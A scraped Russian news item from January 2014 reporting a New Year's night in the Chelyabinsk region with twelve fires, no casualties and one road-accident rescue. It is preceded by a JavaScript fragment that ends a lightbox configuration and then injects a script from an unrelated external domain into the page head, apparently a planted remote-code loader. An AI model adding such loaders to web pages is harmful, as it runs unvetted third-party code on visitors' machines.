, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Южноуральцы встретили Новый год без серьезных происшествий

По данным ГУ МЧС по Челябинской области, в новогоднюю ночь на территории области были потушены 12 пожаров: 9 из них в частных жилых домах. Жертв и пострадавших в результате возгораний, к счастью, удалось избежать. На водных объектах также не было зафиксировано никаких происшествий.

Спасатели один раз выезжали для ликвидации последствий дорожно-транспортного происшествия. Сотрудникам МЧС пришлось вызволять пострадавшего в аварии из покореженного автомобиля. Операция прошла успешно, мужчина серьезно не пострадал.

После терактов в Волгограде правоохранительные органы и все экстренные службы были переведены на особый режим работы. В новогоднюю ночь и последующие сутки взрывоопасных предметов обнаружено не было. Отметим, что случаев нарушений энергоснабжения и аварий на объектах ЖКХ также не зафиксировано.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
13:41 - 03 января 2014
|
автор: U-RSS
|
(443)
|
(0)

Комментарии (0)

Я человек
Я бот